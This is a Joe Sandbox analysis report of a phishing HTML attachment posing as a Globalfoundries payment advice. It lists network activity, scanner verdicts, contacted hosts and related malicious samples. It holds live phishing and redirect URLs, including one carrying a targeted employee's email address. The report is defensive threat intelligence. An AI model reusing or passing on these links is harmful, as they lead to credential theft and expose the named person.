Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49909 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50096 version: TLS 1.2

System Summary

barindex
Source: Name includes: Globalfoundries eCHECK- Payment Advice.htmlInitial sample: payment
Source: classification engineClassification label: mal72.phis.evad.winHTML@35/75@42/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Globalfoundries eCHECK- Payment Advice.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2484,i,4524059451973994455,11659315058774939234,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2484,i,4524059451973994455,11659315058774939234,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow@globalfoundries.comHTTP Parser: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow@globalfoundries.com
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow@globalfoundries.com100%SlashNextCredential Stealing type: Phishing & Social usering
file:///C:/Users/user/Desktop/Globalfoundries%20eCHECK-%20Payment%20Advice.html0%Avira URL Cloudsafe
https://7x8x.digitalvoyage.ru/xaxb/100%Avira URL Cloudphishing
https://futureslocal.com/res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpion0%Avira URL Cloudsafe
https://7x8x.digitalvoyage.ru/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru
    188.114.96.3
    truefalse
      unknown
      code.jquery.com
      151.101.130.137
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            high
            sni1gl.wpc.omegacdn.net
            152.199.21.175
            truefalse
              high
              www.google.com
              142.250.186.36
              truefalse
                high
                s-part-0039.t-0009.t-msedge.net
                13.107.246.67
                truefalse
                  high
                  7x8x.digitalvoyage.ru
                  104.21.112.1
                  truetrue
                    unknown
                    futureslocal.com
                    103.83.194.55
                    truetrue
                      unknown
                      s-part-0032.t-0009.t-msedge.net
                      13.107.246.60
                      truefalse
                        high
                        www.office.com
                        unknown
                        unknownfalse
                          high
                          identity.nel.measure.office.net
                          unknown
                          unknownfalse
                            high
                            aadcdn.msftauth.net
                            unknown
                            unknownfalse
                              high
                              login.microsoftonline.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                  high
                                  https://a.nel.cloudflare.com/report/v4?s=mS%2BSvftu%2FM9y10SgHt2G7NAeC0bqMj4hrxiWPGvuRdNCCnilPQ1Sanfz6Cb6zUOf6zIAiDT7U8Fld0hG92W3flQATbLyo8jx17Lsvpbg3E2BzBiXYc5DPgBkwgP0fQ%3D%3Dfalse
                                    high
                                    https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow@globalfoundries.comtrue
                                    • SlashNext: Credential Stealing type: Phishing & Social usering
                                    unknown
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        high
                                        file:///C:/Users/user/Desktop/Globalfoundries%20eCHECK-%20Payment%20Advice.htmltrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasXfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6202638555e78&lang=autofalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fe6202638555e78/1736275745391/xSVrIn8xCejtnR6false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                high
                                                https://7x8x.digitalvoyage.ru/xaxb/true
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/3jv6g/0x4AAAAAAA4slXohRcRTneR7/auto/fbE/normal/auto/false
                                                  high
                                                  https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fe6202638555e78/1736275745394/47801d01b633f5853ccee222f6369c4f157328d309ea959c6ffee87f510f2278/hatudjn-Xn1x_Ehfalse
                                                      high
                                                      https://7x8x.digitalvoyage.ru/favicon.icofalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                        high
                                                        https://futureslocal.com/res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpionfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://login.microsoftonline.comchromecache_126.3.dr, chromecache_116.3.drfalse
                                                            high
                                                            https://login.windows-ppe.netchromecache_126.3.dr, chromecache_116.3.drfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.18.94.41
                                                              challenges.cloudflare.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              151.101.130.137
                                                              code.jquery.comUnited States
                                                              54113FASTLYUSfalse
                                                              104.21.112.1
                                                              7x8x.digitalvoyage.ruUnited States
                                                              13335CLOUDFLARENETUStrue
                                                              35.190.80.1
                                                              a.nel.cloudflare.comUnited States
                                                              15169GOOGLEUSfalse
                                                              104.17.24.14
                                                              cdnjs.cloudflare.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              142.250.186.36
                                                              www.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              103.83.194.55
                                                              futureslocal.comUnited States
                                                              132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINtrue
                                                              104.18.95.41
                                                              unknownUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              151.101.2.137
                                                              unknownUnited States
                                                              54113FASTLYUSfalse
                                                              239.255.255.250
                                                              unknownReserved
                                                              unknownunknownfalse
                                                              188.114.97.3
                                                              unknownEuropean Union
                                                              13335CLOUDFLARENETUSfalse
                                                              188.114.96.3
                                                              nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ruEuropean Union
                                                              13335CLOUDFLARENETUSfalse
                                                              104.17.25.14
                                                              unknownUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              IP
                                                              192.168.2.6
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1585537
                                                              Start date and time:2025-01-07 19:48:01 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 39s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:7
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Globalfoundries eCHECK- Payment Advice.html
                                                              Detection:MAL
                                                              Classification:mal72.phis.evad.winHTML@35/75@42/14
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .html
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 216.58.212.163, 142.250.181.238, 142.251.168.84, 142.250.185.142, 142.250.186.106, 142.250.185.74, 172.217.18.10, 142.250.185.170, 142.250.185.202, 142.250.185.138, 172.217.16.202, 216.58.206.74, 216.58.212.170, 142.250.186.74, 142.250.185.106, 142.250.185.234, 142.250.181.234, 142.250.186.170, 172.217.23.106, 142.250.184.234, 192.229.221.95, 199.232.210.172, 216.58.212.174, 40.126.31.71, 20.190.159.73, 20.190.159.68, 20.190.159.71, 20.190.159.0, 40.126.31.67, 40.126.31.69, 20.190.159.2, 13.107.6.156, 20.190.159.75, 20.190.159.64, 20.190.159.4, 40.126.32.134, 40.126.32.136, 40.126.32.133, 40.126.32.72, 20.190.160.14, 20.190.160.20, 40.126.32.76, 20.190.160.17, 216.58.206.42, 216.58.212.138, 172.217.18.106, 142.250.184.202, 172.217.16.138, 20.50.201.195, 13.69.109.131, 172.217.18.14, 142.250.186.110, 20.190.159.23, 142.250.184.227, 142.250.186.174, 142.250.185.78, 2.16.168.12, 2.16.168.7, 142.250.185.206, 142.250.185.238, 172.217.16.206, 172.217.16.142, 142.250.74.206,
                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, onedscolprdweu01.westeurope.cloudapp.azure.com, login.mso.msidentity.com, optimizationguide-pa.googleapis.com, clients1.google.com, www.tm.ak.prd.aadg.trafficmanager.net, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.ak.prd.aadg.akadns.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, onedscolprdweu03.westeurope.cloudapp.azure.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net,
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: Globalfoundries eCHECK- Payment Advice.html
                                                              No simulations
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                              • beammp.com/phpmyadmin/
                                                              104.18.94.41ATT562720.htmGet hashmaliciousUnknownBrowse
                                                                https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                  https://publuu.com/flip-book/763064/1693399Get hashmaliciousUnknownBrowse
                                                                    https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                      Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                        https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                          Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                            https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                              https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                                https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.comGet hashmaliciousUnknownBrowse
                                                                                  151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                                                  http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.11.3.min.js
                                                                                  http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.7.min.js
                                                                                  https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-3.3.1.min.js
                                                                                  http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                  • code.jquery.com/jquery-1.7.2.min.js
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  challenges.cloudflare.comATT562720.htmGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.95.41
                                                                                  https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://publuu.com/flip-book/763064/1693399Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                  • 104.18.95.41
                                                                                  Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.95.41
                                                                                  Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                  • 104.18.94.41
                                                                                  https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.18.95.41
                                                                                  code.jquery.comATT562720.htmGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.66.137
                                                                                  https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.2.137
                                                                                  http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
                                                                                  • 151.101.194.137
                                                                                  Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
                                                                                  • 151.101.2.137
